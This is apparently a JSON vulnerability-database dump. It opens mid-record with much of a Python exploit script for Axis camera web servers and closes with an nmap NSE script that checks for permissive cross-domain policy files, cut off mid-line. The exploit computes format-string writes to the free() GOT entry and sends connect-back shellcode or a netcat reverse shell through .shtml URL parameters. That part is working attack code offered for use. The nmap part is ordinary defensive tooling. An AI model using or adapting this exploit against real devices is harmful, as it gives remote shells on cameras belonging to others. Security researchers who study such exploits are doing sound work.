\n# Little Endian \nPP1 = '%{:02x}'.format(int(port_hex[0],16)) \nPP0 = '%{:02x}'.format(int(port_hex[1],16)) \nelse: \nprint \"[!] Unknown shellcode! (%s)\" % str(target[Key][6]) \nsys.exit(1) \n \n# Replace LHOST / LPORT in URL encoded shellcode \nshell = shellcode_db(rhost,verbose).sc(target[Key][6]) \nshell = shell.replace(\"IP1\",IP1) \nshell = shell.replace(\"IP2\",IP2) \nshell = shell.replace(\"IP3\",IP3) \nshell = shell.replace(\"IP4\",IP4) \nshell = shell.replace(\"PP0\",PP0) \nshell = shell.replace(\"PP1\",PP1) \nFMSdata += shell \n \n# \n# Calculate the FMS values to be used \n# \n# Get pre-defined values \nALREADY_WRITTEN = 40 # Already 'written' in the daemon before our FMS \n# POP_SIZE = 8 \nPOP_SIZE = 1 \n \nGOThex = target[Key][0] \nBSShex = target[Key][1] \nGOTint = int(GOThex) \n \n# 'One-Write-Where-And-What' \nif not NCSH1 and not NCSH2: \n \nPOP1 = target[Key][2] \nPOP2 = target[Key][3] \n \n# Calculate for creating the FMS code \nALREADY_WRITTEN = ALREADY_WRITTEN + (POP1 * POP_SIZE) \nGOTint = (GOTint - ALREADY_WRITTEN) \n \nALREADY_WRITTEN = ALREADY_WRITTEN + (POP2 * POP_SIZE) \n \nBSSint = int(BSShex) \nBSSint = (BSSint - GOTint - ALREADY_WRITTEN) \n \n# if verbose: \n# print \"[Verbose] Calculated GOTint:\",GOTint,\"Calculated BSSint:\",BSSint \n \n# 'Two-Write-Where-And-What' using \"New Style\" \nelif NCSH2: \n \nPOP1 = target[Key][2] \nPOP2 = target[Key][3] \nPOP3 = target[Key][4] \nPOP4 = target[Key][5] \nPOP2_SIZE = 2 \n \n# We need to count higher than provided address for the jump \nBaseAddr = 0x10000 + BSShex \n \n# Calculate for creating the FMS code \nGOTint = (GOTint - ALREADY_WRITTEN) \n \nALREADY_WRITTEN = ALREADY_WRITTEN + GOTint \n \n# Calculate FirstWhat value \nFirstWhat = BaseAddr - (ALREADY_WRITTEN) \n \nALREADY_WRITTEN = ALREADY_WRITTEN + FirstWhat \n \n# Calculate SecondWhat value, so it always is 0x20300 \nSecondWhat = 0x20300 - (ALREADY_WRITTEN + POP2_SIZE) \n \nshell = shellcode_db(rhost,verbose).sc(target[Key][6]) \nshell = shell.replace(\"LHOST\",lhost) \nshell = shell.replace(\"LPORT\",lport) \n \nFirstWhat = FirstWhat - len(shell) \n \n# if verbose: \n# print \"[Verbose] Calculated GOTint:\",GOTint,\"Calculated FirstWhat:\",FirstWhat,\"Calculated SecondWhat:\",SecondWhat \n \n \n# 'Two-Write-Where-And-What' using \"Old Style\" \nelif NCSH1: \n \nPOP1 = target[Key][2] \nPOP2 = target[Key][3] \nPOP3 = target[Key][4] \nPOP4 = target[Key][5] \nPOP2_SIZE = 2 \n \n# FirstWhat writes with 4 bytes (Y) (0x0002YYYY) \n# SecondWhat writes with 1 byte (Z) (0x00ZZYYYY) \nif BSShex > 0x10000: \nMSB = 1 \nelse: \nMSB = 0 \n \n# We need to count higher than provided address for the jump \nBaseAddr = 0x10000 + BSShex \n \n# Calculate for creating the FMS code \nALREADY_WRITTEN = ALREADY_WRITTEN + (POP1 * POP_SIZE) \n \nGOTint = (GOTint - ALREADY_WRITTEN) \n \nALREADY_WRITTEN = ALREADY_WRITTEN + GOTint + POP2_SIZE + (POP3 * POP_SIZE) \n \n# Calculate FirstWhat value \nFirstWhat = BaseAddr - (ALREADY_WRITTEN) \n \nALREADY_WRITTEN = ALREADY_WRITTEN + FirstWhat + (POP4 * POP_SIZE) \n \n# Calculate SecondWhat value, so it always is 0x203[00] or [01] \nSecondWhat = 0x20300 - (ALREADY_WRITTEN) + MSB \n \nshell = shellcode_db(rhost,verbose).sc(target[Key][6]) \nshell = shell.replace(\"LHOST\",lhost) \nshell = shell.replace(\"LPORT\",lport) \n \nGOTint = GOTint - len(shell) \n \n# if verbose: \n# print \"[Verbose] Calculated GOTint:\",GOTint,\"Calculated FirstWhat:\",FirstWhat,\"Calculated SecondWhat:\",SecondWhat \n \nelse: \nprint \"[!] NCSH missing, exiting\" \nsys.exit(1) \n# \n# Let's start the exploiting procedure \n# \n \n# \n# Stage one \n# \nif NCSH1 or NCSH2: \n \n# \"New Style\" needs to make the exploit in two stages \nif NCSH2: \nFMScode = do_FMS(rhost,verbose) \n# Writing 'FirstWhere' and 'SecondWhere' \n# 1st request \nFMScode.AddADDR(GOTint) # Run up to free() GOT address \n# \n# 1st and 2nd \"Write-Where\" \nFMScode.AddDirectParameterN(POP1) # Write 1st Where \nFMScode.Add(\"XX\") # Jump up two bytes for next address \nFMScode.AddDirectParameterN(POP2) # Write 2nd Where \nFMSdata = FMScode.FMSbuild() \nelse: \nFMSdata = \"\" \n \nprint \"[>] StG_1: Preparing netcat connect back shell to address:\",'0x{:08x}'.format(BSShex),\"(%d bytes)\" % (len(FMSdata)) \nelse: \nprint \"[>] StG_1: Sending and decoding shellcode to address:\",'0x{:08x}'.format(BSShex),\"(%d bytes)\" % (len(FMSdata)) \n \n# Inject our encoded shellcode to be decoded in MIPS/CRISv32/ARM \n# Actually, any valid and public readable .shtml file will work... \n# (One of the two below seems always to be usable) \n# \n# For NCSH1 shell, we only check if the remote file are readable, for usage in Stage two \n# For NCSH2, 1st and 2nd (Write-Where) FMS comes here, and calculations start after '=' in the url \n# \ntry: \ntarget_url = \"/httpDisabled.shtml?user_agent=\" \nif noexploit: \ntarget_url2 = target_url \nelse: \ntarget_url2 = \"/httpDisabled.shtml?&http_user=\" \n \nif NCSH2: \nhtml = HTTPconnect(rhost,proto,verbose,creds,noexploit).RAW(target_url2 + FMSdata) # Netcat shell \nelse: \nhtml = HTTPconnect(rhost,proto,verbose,creds,noexploit).Send(target_url + FMSdata) \nexcept urllib2.HTTPError as e: \nif e.code == 404: \nprint \"[<] Error\",e.code,e.reason \ntarget_url = \"/view/viewer_index.shtml?user_agent=\" \nif noexploit: \ntarget_url2 = target_url \nelse: \ntarget_url2 = \"/view/viewer_index.shtml?&http_user=\" \nprint \"[>] Using alternative target shtml\" \nif NCSH2: \nhtml = HTTPconnect(rhost,proto,verbose,creds,noexploit).RAW(target_url2 + FMSdata) # Netcat shell \nelse: \nhtml = HTTPconnect(rhost,proto,verbose,creds,noexploit).Send(target_url + FMSdata) \nexcept Exception as e: \nif not NCSH2: \nprint \"[!] Shellcode delivery failed:\",str(e) \nsys.exit(1) \n# \n# Stage two \n# \n \n# \n# Building and sending the FMS code to the target \n# \nprint \"[i] Building the FMS code...\" \n \nFMScode = do_FMS(rhost,verbose) \n \n# This is an 'One-Write-Where-And-What' for FMS \n# \n# Stack Example: \n# \n# Stack content | Stack address (ASLR) \n# \n# 0x0 | @0x7e818dbc -> [POP1's] \n# 0x0 | @0x7e818dc0 -> [free () GOT address] \n# 0x7e818dd0 | @0x7e818dc4>>>>>+ \"Write-Where\" (%n) \n# 0x76f41fb8 | @0x7e818dc8 | -> [POP2's] \n# 0x76f3d70c | @0x7e818dcc | -> [BSS shell code address] \n# 0x76f55ab8 | @0x7e818dd0<<<<<+ \"Write-What\" (%n) \n# 0x1 | @0x7e818dd4 \n# \nif not NCSH1 and not NCSH2: \nFMScode.AddPOP(POP1) # 1st serie of 'Old Style' POP's \nFMScode.AddADDR(GOTint) # GOT Address \nFMScode.AddWRITEn(1) # 4 bytes Write-Where \n# FMScode.AddWRITElln(1) # Easier to locate while debugging as this will write double word (0x00000000004xxxxx) \n \nFMScode.AddPOP(POP2) # 2nd serie of 'Old Style' POP's \nFMScode.AddADDR(BSSint) # BSS shellcode address \nFMScode.AddWRITEn(1) # 4 bytes Write-What \n# FMScode.AddWRITElln(1) # Easier to locate while debugging as this will write double word (0x00000000004xxxxx) \n \n# End of 'One-Write-Where-And-What' \n \n \n# This is an 'Two-Write-Where-And-What' for FMS \n# \n# Netcat shell and FMS code in same request, we will jump to the SSI function <!--#exec cmd=\"xxx\" --> \n# We jump over all SSI tagging to end up directly where \"xxx\" will \n# be the string passed on to SSI exec function ('/bin/sh -c', pipe(), vfork() and execv()) \n# \n# The Trick here is to write lower target address, that we will jump to when calling free(), \n# than the FMS has counted up to, by using Two-Write-Where-and-What with two writes to free() GOT \n# address with two LSB writes. \n# \nelif NCSH2: \n# \n# Direct parameter access for FMS exploitation are really nice and easy to use. \n# However, we need to exploit in two stages with two requests. \n# (I was trying to avoid this \"Two-Stages\" so much as possibly in this exploit developement...) \n# \n# 1. Write \"Two-Write-Where\", where 2nd is two bytes higher than 1st (this allows us to write to MSB and LSB) \n# 2. Write with \"Two-Write-What\", where 1st (LSB) and 2nd (MSB) \"Write-Where\" pointing to. \n# \n# With \"new style\", we can write with POPs independently as we don't depended of same criteria as in \"NCSH1\", \n# we can use any regular \"Stack-to-Stack\" pointer as we can freely choose the POP-and-Write. \n# [Note the POP1/POP2 (low-high) vs POP3/POP4 (high-low) difference.] \n# \n# Stack Example: \n# \n# Stack content | Stack address (ASLR) \n# \n# 0x7e818dd0 | @0x7e818dc4>>>>>+ 1st \"Write-Where\" [@Stage One] \n# 0x76f41fb8 | @0x7e818dc8 | \n# 0x76f3d70c | @0x7e818dcc | \n# 0x76f55ab8 | @0x7e818dd0<<<<<+ 1st \"Write-What\" [@Stage Two] \n# 0x1 | @0x7e818dd4 \n# [....] \n# 0x1c154 | @0x7e818e10 \n# 0x7e818e20 | @0x7e818e14>>>>>+ 2nd \"Write-Where\" [@Stage One] \n# 0x76f41fb8 | @0x7e818e18 | \n# 0x76f3d70c | @0x7e818e1c | \n# 0x76f55758 | @0x7e818e20<<<<<+ 2nd \"Write-What\" [@Stage Two] \n# 0x1 | @0x7e818e24 \n# \n \nFMScode.Add(shell) \n \n# \n# 1st and 2nd \"Write-Where\" already done in stage one \n# \n# 1st and 2nd \"Write-What\" \n# \nFMScode.AddADDR(GOTint + FirstWhat) # Run up to 0x0002XXXX, write with LSB (0xXXXX) to LSB in target address. \nFMScode.AddDirectParameterN(POP3) # Write with 4 bytes (we want to zero out in MSB) \nFMScode.AddADDR(SecondWhat + 3) # Run up to 0x00020300, write with LSB (0xZZ) to lower part of MSB. (0x00ZZXXXX) \nFMScode.AddDirectParameterHHN(POP4) # Write with one byte 0x000203[00] or 0x000203[01] depending from above calculation \n \nelif NCSH1: \n# Could use direct argument addressing here, but I like to keep \"old style\" as well, \n# as it's another interesting concept. \n# \n# Two matching stack contents -> stack address in row w/o or max two POP's between, \n# is needed to write two bytes higher (MSB). \n# \n# \n# Stack Example: \n# \n# Stack Content | @Stack Address (ASLR) \n# \n# 0x9c | @7ef2fde8 -> [POP1's] \n# [....] \n# 0x1 | @7ef2fdec -> [GOTint address] \n#------ \n# 0x7ef2fe84 | @7ef2fdf0 >>>>>+ Write 'FirstWhere' (%n) [LSB] \n# -> 'XX' | two bytes (Can be one or two POP's as well, by using %2c or %1c%1c as POPer) \n# 0x7ef2fe8c | @7ef2fdf4 >>>>>>>>>+ Write 'SecondWhere' (%n) [MSB] \n# ------ | | \n# [....] -> [POP3's] | | \n# 0x7fb99dc | @7ef2fe7c | | \n# 0x7ef2fe84 | @7ef2fe80 | | [Count up to 0x2XXXX] \n# 0x7ef2ff6a | @7ef2fe84 <<<<<+ | Write 'XXXX' 'FirstWhat' (%n) (0x0002XXXX)) \n# -> [POP4's] | \n# (nil) | @7ef2fe88 | [Count up to 0x20300] \n# 0x7ef2ff74 | @7ef2fe8c <<<<<<<<<+ Write 'ZZ' 'SecondWhat' (%hhn) (0x00ZZXXXX) \n \nFMScode.Add(shell) \n \n# Write FirstWhere for 'FirstWhat' \nFMScode.AddPOP(POP1) \nFMScode.AddADDR(GOTint) # Run up to free() GOT address \nFMScode.AddWRITEn(1) \n \n# Write SecondWhere for 'SecondWhat' \n# \n# This is special POP with 1 byte, we can maximum POP 2! \n# \n# This POP sequence is actually no longer used in this part of exploit, was developed to meet the requirement \n# for exploitation of 5.2.x and 5.40.x, as there needed to be one POP with maximum of two bytes. \n# Kept as reference as we now using direct parameter access AKA 'New Style\" for 5.2x/5.4x \n# \nif POP2 != 0: \n# We only want to write 'SecondWhat' two bytes higher at free() GOT \nif POP2 > 2: \nprint \"POP2 can't be greater than two!\" \nsys.exit(1) \nif POP2 == 1: \nFMScode.Add(\"%2c\") \nelse: \nFMScode.Add(\"%1c%1c\") \nelse: \nFMScode.Add(\"XX\") \nFMScode.AddWRITEn(1) \n \n# Write FirstWhat pointed by FirstWhere \nFMScode.AddPOP(POP3) # Old Style POP's \nFMScode.AddADDR(FirstWhat) # Run up to 0x0002XXXX, write with LSB (0xXXXX) to LSB in target address. \nFMScode.AddWRITEn(1) # Write with 4 bytes (we want to zero out in MSB) \n \n# Write SecondWhat pointed by SecondWhere \nFMScode.AddPOP(POP4) # Old Style POP's \nFMScode.AddADDR(SecondWhat) # Run up to 0x00020300, write with LSB (0xZZ) to lower part of MSB. (0x00ZZXXXX) \nFMScode.AddWRITEhhn(1) # Write with one byte 0x000203[00] or 0x000203[01] depending from above calculation \n \nelse: \nsys.exit(1) \n \nFMSdata = FMScode.FMSbuild() \n \nprint \"[>] StG_2: Writing shellcode address to free() GOT address:\",'0x{:08x}'.format(GOThex),\"(%d bytes)\" % (len(FMSdata)) \n \n# FMS comes here, and calculations start after '=' in the url \ntry: \nif NCSH1 or NCSH2: \nhtml = HTTPconnect(rhost,proto,verbose,creds,noexploit).RAW(target_url2 + FMSdata) # Netcat shell \nelse: \nhtml = HTTPconnect(rhost,proto,verbose,creds,noexploit).Send(target_url2 + FMSdata) # MIPS/CRIS shellcode \nexcept urllib2.HTTPError as e: \nprint \"[!] Payload delivery failed:\",str(e) \nsys.exit(1) \nexcept Exception as e: \n# 1st string returned by HTTP mode, 2nd by HTTPS mode \nif str(e) == \"timed out\" or str(e) == \"('The read operation timed out',)\": \nprint \"[i] Timeout! Payload delivered sucessfully!\" \nelse: \nprint \"[!] Payload delivery failed:\",str(e) \nsys.exit(1) \n \nif noexploit: \nprint \"\\n[*] Not exploiting, no shell...\\n\" \nelse: \nprint \"\\n[*] All done, enjoy the shell...\\n\" \n \n# \n# [EOF] \n# \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/137941/axismpqtpacs-format.txt", "cvss": {"score": 0.0, "vector": "NONE"}}], "nmap": [{"lastseen": "2018-11-07T16:36:37", "bulletinFamily": "scanner", "description": "Checks the cross-domain policy file (/crossdomain.xml) and the client-acces-policy file (/clientaccesspolicy.xml) in web applications and lists the trusted domains. Overly permissive settings enable Cross Site Request Forgery attacks and may allow attackers to access sensitive data. This script is useful to detect permissive configurations and possible domain names available for purchase to exploit the application. \n\nThe script queries instantdomainsearch.com to lookup the domains. This functionality is turned off by default, to enable it set the script argument http-cross-domain-policy.domain-lookup. \n\nReferences: \n\n * http://sethsec.blogspot.com/2014/03/exploiting-misconfigured-crossdomainxml.html\n * http://gursevkalra.blogspot.com/2013/08/bypassing-same-origin-policy-with-flash.html\n * https://www.adobe.com/devnet/articles/crossdomain_policy_file_spec.html\n * https://www.adobe.com/devnet-docs/acrobatetk/tools/AppSec/CrossDomain_PolicyFile_Specification.pdf\n * https://www.owasp.org/index.php/Test_RIA_cross_domain_policy_%28OTG-CONFIG-008%29\n * http://acunetix.com/vulnerabilities/web/insecure-clientaccesspolicy-xml-file\n\n## Script Arguments \n\n#### http-cross-domain-policy.domain-lookup \n\nBoolean to check domain availability. Default:false\n\n#### slaxml.debug \n\nSee the documentation for the slaxml library. \n\n#### http.host, http.max-cache-size, http.max-pipeline, http.pipeline, http.useragent \n\nSee the documentation for the http library. \n\n#### smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername \n\nSee the documentation for the smbauth library. \n\n#### vulns.short, vulns.showall \n\nSee the documentation for the vulns library. \n\n## Example Usage \n\n * nmap --script http-cross-domain-policy <target>\n\n * nmap -p 80 --script http-cross-domain-policy --script-args http-cross-domain-policy.domain-lookup=true <target>\n \n\n## Script Output \n \n \n PORT STATE SERVICE REASON\n 8080/tcp open http-proxy syn-ack\n | http-cross-domain-policy:\n | VULNERABLE:\n | Cross-domain policy file (crossdomain.xml)\n | State: VULNERABLE\n | A cross-domain policy file specifies the permissions that a web client such as Java, Adobe Flash, Adobe Reader,\n | etc. use to access data across different domains. A client acces policy file is similar to cross-domain policy\n | but is used for M$ Silverlight applications. Overly permissive configurations enables Cross-site Request\n | Forgery attacks, and may allow third parties to access sensitive data meant for the user.\n | Check results:\n | /crossdomain.xml:\n | <cross-domain-policy>\n | <allow-access-from domain=\"*.example.com\"/>\n | <allow-access-from domain=\"*.exampleobjects.com\"/>\n | <allow-access-from domain=\"*.example.co.in\"/>'\n | </cross-domain-policy>\n | /clientaccesspolicy.xml:\n | <?xml version=\"1.0\" encoding=\"utf8\"?>\n | </accesspolicy>\n | <crossdomainaccess>\n | <policy>\n | <allowfrom httprequestheaders=\"SOAPAction\">\n | <domain uri=\"*\"/>\n | <domain uri=\"*.example.me\"/>\n | <domain uri=\"*.exampleobjects.me\"/>\n | </allowfrom>\n | <granto>\n | <resource path=\"/\" includesubpaths=\"true\"/>\n | </granto>\n | </policy>\n | </crossdomainaccess>\n | </accesspolicy>\n | Extra information:\n | Trusted domains:example.com, exampleobjects.com, example.co.in, *, example.me, exampleobjects.me\n | Use the script argument 'domain-lookup' to find trusted domains available for purchase\n | References:\n | http://gursevkalra.blogspot.com/2013/08/bypassing-same-origin-policy-with-flash.html\n | http://sethsec.blogspot.com/2014/03/exploiting-misconfigured-crossdomainxml.html\n | https://www.owasp.org/index.php/Test_RIA_cross_domain_policy_%28OTG-CONFIG-008%29\n | http://acunetix.com/vulnerabilities/web/insecure-clientaccesspolicy-xml-file\n | https://www.adobe.com/devnet-docs/acrobatetk/tools/AppSec/CrossDomain_PolicyFile_Specification.pdf\n |_ https://www.adobe.com/devnet/articles/crossdomain_policy_file_spec.html\n \n \n\n## Requires \n\n * http\n * stdnse\n * vulns\n * nmap\n * shortport\n * table\n * tableaux\n * string\n * slaxml\n\n* * *\n", "modified": "2018-11-06T15:07:01", "published": "2015-07-04T07:26:04", "id": "NMAP:HTTP-CROSS-DOMAIN-POLICY.NSE", "href": "https://nmap.org/nsedoc/scripts/http-cross-domain-policy.html", "title": "http-cross-domain-policy NSE Script", "type": "nmap", "sourceData": "local http = require \"http\"\nlocal stdnse = require \"stdnse\"\nlocal vulns = require \"vulns\"\nlocal nmap = require \"nmap\"\nlocal shortport = require \"shortport\"\nlocal table = require \"table\"\nlocal tableaux = require \"tableaux\"\nlocal string = require \"string\"\nlocal slaxml = require \"slaxml\"\n\ndescription = [[\nChecks the cross-domain policy file (/crossdomain.xml) and the client-acces-policy file (/clientaccesspolicy.xml)\nin web applications and lists the trusted domains. Overly permissive settings enable Cross Site Request Forgery\nattacks and may allow attackers to access sensitive data. This script is useful to detect permissive\nconfigurations and possible domain names available for purchase to exploit the application.\n\nThe script queries instantdomainsearch.com to lookup the domains. This functionality is\nturned off by default, to enable it set the script argument http-cross-domain-policy.domain-lookup.\n\nReferences:\n* http://sethsec.blogspot.com/2014/03/exploiting-misconfigured-crossdomainxml.html\n* http://gursevkalra.blogspot.com/2013/08/bypassing-same-origin-policy-with-flash.html\n* https://www.adobe.com/devnet/articles/crossdomain_policy_file_spec.html\n* https://www.adobe.com/devnet-docs/acrobatetk/tools/AppSec/CrossDomain_PolicyFile_Specification.pdf\n* https://www.owasp.org/index.php/Test_RIA_cross_domain_policy_%28OTG-CONFIG-008%29\n* http://acunetix.com/vulnerabilities/web/insecure-clientaccesspolicy-xml-file\n]]\n\n---\n-- @usage nmap --script http-cross-domain-policy <target>\n-- @usage nmap -p 80 --script http-cross-domain-policy --script-args http-cross-domain-policy.domain-lookup=true <target>\n--\n-- @output\n-- PORT STATE SERVICE REASON\n-- 8080/tcp open http-proxy syn-ack\n-- | http-cross-domain-policy:\n-- | VULNERABLE:\n-- | Cross-domain policy file (crossdomain.xml)\n-- | State: VULNERABLE\n-- | A cross-domain policy file specifies the permissions that a web client such as Java, Adobe Flash, Adobe Reader,\n-- | etc. use to access data across different domains. A client acces policy file is similar to cross-domain policy\n-- | but is used for M$ Silverlight applications. Overly permissive configurations enables Cross-site Request\n-- | Forgery attacks, and may allow third parties to access sensitive data meant for the user.\n-- | Check results:\n-- | /crossdomain.xml:\n-- | <cross-domain-policy>\n-- | <allow-access-from domain=\"*.example.com\"/>\n-- | <allow-access-from domain=\"*.exampleobjects.com\"/>\n-- | <allow-access-from domain=\"*.example.co.in\"/>'\n-- | </cross-domain-policy>\n-- | /clientaccesspolicy.xml:\n-- | <?xml version=\"1.0\" encoding=\"utf8\"?>\n-- | </accesspolicy>\n-- | <crossdomainaccess>\n-- | <policy>\n-- | <allowfrom httprequestheaders=\"SOAPAction\">\n-- | <domain uri=\"*\"/>\n-- | <domain uri=\"*.example.me\"/>\n-- | <domain uri=\"*.exampleobjects.me\"/>\n-- | </allowfrom>\n-- | <granto>\n-- | <resource path=\"/\" includesubpaths=\"true\"/>\n-- | </granto>\n-- | </policy>\n-- | </crossdomainaccess>\n-- | </accesspolicy>\n-- | Extra information:\n-- | Trusted domains:example.com, exampleobjects.com, example.co.in, *, example.me, exampleobjects.me\n-- | Use the script argument 'domain-lookup' to find trusted domains available for purchase\n-- | References:\n-- | http://gursevkalra.blogspot.com/2013/08/bypassing-same-origin-policy-with-flash.html\n-- | http://sethsec.blogspot.com/2014/03/exploiting-misconfigured-crossdomainxml.html\n-- | https://www.owasp.org/index.php/Test_RIA_cross_domain_policy_%28OTG-CONFIG-008%29\n-- | http://acunetix.com/vulnerabilities/web/insecure-clientaccesspolicy-xml-file\n-- | https://www.adobe.com/devnet-docs/acrobatetk/tools/AppSec/CrossDomain_PolicyFile_Specification.pdf\n-- |_ https://www.adobe.com/devnet/articles/crossdomain_policy_file_spec.html\n--\n--\n-- @args http-cross-domain-policy.domain-lookup Boolean to check domain availability. Default:false\n--\n-- @xmloutput\n-- <elem key=\"title\">Cross-domain and Client Access policies.</elem>\n-- <elem key=\"state\">VULNERABLE</elem>\n-- <table key=\"description\">\n-- <elem>A cross-domain policy file specifies the permissions that a\n-- web client such as Java, Adobe Flash, Adobe Reader, etc. use to\n-- access data across different domains. A client acces policy file\n-- is similar to cross-domain policy but is used for M$ Silverlight\n-- applications. Overly permissive configurations enables Cross-site\n-- Request Forgery attacks, and may allow third parties to access\n-- sensitive data meant for the user.</elem>\n-- </table>\n-- <table key=\"check_results\">\n-- <table>\n-- <elem key=\"name\">/crossdomain.xml</elem>\n-- <elem key=\"body\"><cross-domain-policy>\n-- <allow-access-from domain=\"*.example.com\"/>\n-- <allow-access-from domain=\"*.exampleobjects.com\"/>\n-- <allow-access-from domain=\"*.example.co.in\"/>'\n-- </cross-domain-policy></elem>\n-- </table>\n-- <table>\n-- <elem key=\"name\">/clientaccesspolicy.xml</elem>\n-- <elem key=\"body\"><?xml version=\"1.0\" encoding=\"utf8\"?>\n-- </accesspolicy> <crossdomainaccess> <policy>\n-- <allowfrom httprequestheaders=\"SOAPAction\"> <domain\n-- uri=\"*\"/> <domain uri=\"*.example.me\"/> <domain\n-- uri=\"*.exampleobjects.me\"/> </allowfrom> <granto>\n-- <resource path=\"/\" includesubpaths=\"true\"/>\n-- </granto> </policy> </crossdomainaccess>\n-- </accesspolicy></elem>\n-- </table>\n-- </table>\n-- <table key=\"extra_info\">\n-- <elem>Trusted domains:example.com, exampleobjects.com,\n-- example.co.in, *, example.me, exampleobjects.me Use the script argument\n-- 'domain-lookup' to find trusted domains available for\n-- purchase</elem>\n-- </table>\n-- <table key=\"refs\">\n-- <elem>\n-- https://www.adobe.com/devnet/articles/crossdomain_policy_file_spec.html</elem>\n-- <elem>\n-- https://www.owasp.org/index.php/Test_RIA_cross_domain_policy_%28OTG-CONFIG-008%29</elem>\n-- <elem>\n-- http://sethsec.blogspot.com/2014/03/exploiting-misconfigured-crossdomainxml.html</elem>\n-- <elem>\n-- https://www.adobe.com/devnet-docs/acrobatetk/tools/AppSec/CrossDomain_PolicyFile_Specification.pdf</elem>\n-- <elem>\n-- http://acunetix.com/vulnerabilities/web/insecure-clientaccesspolicy-xml-file</elem>\n-- <elem>\n-- http://gursevkalra.blogspot.com/2013/08/bypassing-same-origin-policy-with-flash.html</elem>\n-- </table>\n--\n---\n\nauthor = {\"Seth Art <sethsec()gmail>\", \"Paulino Calderon <calderon()websec.mx>\", \"Gyanendra Mishra\"}\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"safe\", \"external\", \"vuln\"}\n\nportrule = shortport.http\nlocal tlds_instantdomainsearch = {\".com\", \".net\", \".org\", \".co\", \".info\", \".biz\", \".mobi\", \".us\", \".ca\", \".co.uk\",\n \".in\", \".io\", \".it\", \".pt\", \".me\", \".tv\"}\n\n---\n-- Queries instantdomainsearch.com to check if domains are available\n-- Returns nil if the query failed and true/false to indicate domain availability\n--\n-- Sample response:\n--\n-- {\"label\":\"nmap\",\"tld\":\"com\",\"isRegistered\":true,\"isBid\":false,\n-- \"price\":0,\"aftermarketProvider\":\"\",\"rank\":14.028985023498535,\"search\":\"name\"}\n-- {\"words\":[\"nmap\"],\"synonyms\":[\"nmap\",\"scans\"],\"tld\":\"com\",\"isBid\":false,\"price\":0,\n-- \"aftermarketProvider\":\"\",\"rank\":0.23496590554714203,\"search\":\"word\"}\n-- {\"label\":\"snmap\",\"tld\":\"com\",\"isBid\":false,\"price\":2994,\"aftermarketProvider\":\"afternic.com\",\n-- \"rank\":9.352656364440918,\"search\":\"ngram\"}\n---\nlocal function check_domain (domain)\n local name, tld = domain:match(\"(%w*)%.*(%w*%.%w+)$\")\n if not(tableaux.contains(tlds_instantdomainsearch, tld)) then\n stdnse.debug(1, \"TLD '%s' is not supported by instantdomainsearch.com. Check manually.\", tld)\n return nil\n end\n\n stdnse.print_debug(1, \"Checking availability of domain %s with tld:%s \", name, tld)\n local path = string.format(\"/all/%s?/tlds=%s&limit=1\", name, tld)\n local response = http.get(\"instantdomainsearch.com\", 443, path, {any_af=true})\n if ( not(response) or (response.status and response.status ~= 200) ) then\n return nil\n end\n local _, _, registered = response.body:find('\"isRegistered\":(.-),\"isBid\":')\n return registered\nend\n\n---\n-- Requests and parses crossdomain.xml file\n---\nfunction check_crossdomain(host, port, lookup)\n local trusted_domains = {}\n local trusted_domains_available = {}\n local content = {}\n local req_opt = {redirect_ok=function(host,port)\n local c = 3\n return function(uri)\n if ( c==0 ) then return false end\n c = c - 1\n return true\n end\n end}\n local domain_table = {}\n local CROSSDOMAIN = {\n uri = '/crossdomain.xml',\n attribute = function(name, value)\n if name == 'domain' then\n table.insert(domain_table, value)\n end\n end,\n }\n\n local CLIENTACCESS = {\n uri = '/clientaccesspolicy.xml',\n attribute = function(name, value)\n if name == 'uri' then\n table.insert(domain_table, value)\n end\n end,\n }\n local lists = {}\n table.insert(lists, CROSSDOMAIN)\n table.insert(lists, CLIENTACCESS)\n for _, list in pairs(lists) do\n local req = http.get(host, port, list.uri, req_opt)\n if req.status and req.status == 200 then\n domain_table = {}\n local parser = slaxml.parser:new({attribute = list.attribute})\n parser:parseSAX (req.body)\n table.insert(content, {name = list.uri, body = req.body})\n for _, domain in pairs(domain_table) do\n --Matches wildcard, which means vulnerable as any host can comunicate with app\n if domain == '*' or domain == 'http://' or domain == 'https://' then\n stdnse.debug(1, \"Wildcard detected!\")\n table.insert(trusted_domains, domain)\n else\n --Parse domains\n local line = domain:gsub(\"%*%.\", \"\")\n stdnse.debug(1, \"Extracted line: %s\", line)\n local domain = line:match(\"(%w*%.*%w+%.%w+)$\")\n if domain ~= nil then\n --Deals with tlds with double extension\n local tld = domain:match(\"%w*(%.%w*)%.%w+$\")\n if tld ~= nil and not(tableaux.contains(tlds_instantdomainsearch, tld)) then\n domain = domain:match(\"%w*%.(.*)$\")\n end\n --We add domains only once as they can appear multiple times\n if not(tableaux.contains(trusted_domains, domain)) then\n stdnse.debug(1, \"Added trusted domain:%s\", domain)\n table.insert(trusted_domains, domain)\n --Lookup domains if script argument is set\n if ( lookup ) then\n if check_domain(domain) == \"false\" then\n stdnse.debug(1, \"Domain '%s' is available for purchase!\", domain)\n table.insert(trusted_domains_available, domain)\n end\n end\n end\n end\n stdnse.debug(1, \"Extracted domain: %s\", domain)\n end\n end\n end\n end\n if (#trusted_domains> 0) then\n return true, trusted_domains, trusted_domains_available, content\n else\n return nil\n end\nend\n\n\naction = function(host, port)\n local lookup = stdnse.get_script_args(SCRIPT_NAME..\".domain-lookup\") or false\n\n local vuln_report = vulns.Report:new(SCRIPT_NAME, host, port)\n local vuln = {\n title = 'Cross-domain and Client Access policies.',\n state = vulns.STATE.NOT_VULN,\n description = [[\nA cross-domain policy file specifies the permissions that a web client such as Java, Adobe Flash, Adobe Reader,\netc. use to access data across different domains. A client acces policy file is similar to cross-domain policy\nbut is used for M$ Silverlight applications. Overly permissive configurations enables Cross-site Request\nForgery attacks, and may allow third parties to access sensitive data meant for the user.]],\n references = {\n 'http://sethsec.blogspot.com/2014/03/exploiting-misconfigured-crossdomainxml.html',\n 'http://gursevkalra.blogspot.com/2013/08/bypassing-same-origin-policy-with-flash.html',\n 'https://www.adobe.com/devnet/articles/crossdomain_policy_file_spec.html',\n 'https://www.adobe.com/devnet-docs/acrobatetk/tools/AppSec/CrossDomain_PolicyFile_Specification.pdf',\n 'https://www.owasp.org/index.php/Test_RIA_cross_domain_policy_%28OTG-CONFIG-008%29',\n 'http://acunetix.com/vulnerabilities/web/insecure-clientaccesspolicy-xml-file'\n },\n }\n local check, domains, domains_available, content = check_crossdomain(host, port, lookup)\n local mt = {__tostring=function(p) return (\"%s:\\n %s\"):format(p.name, p.body:gsub(\"\\n\", 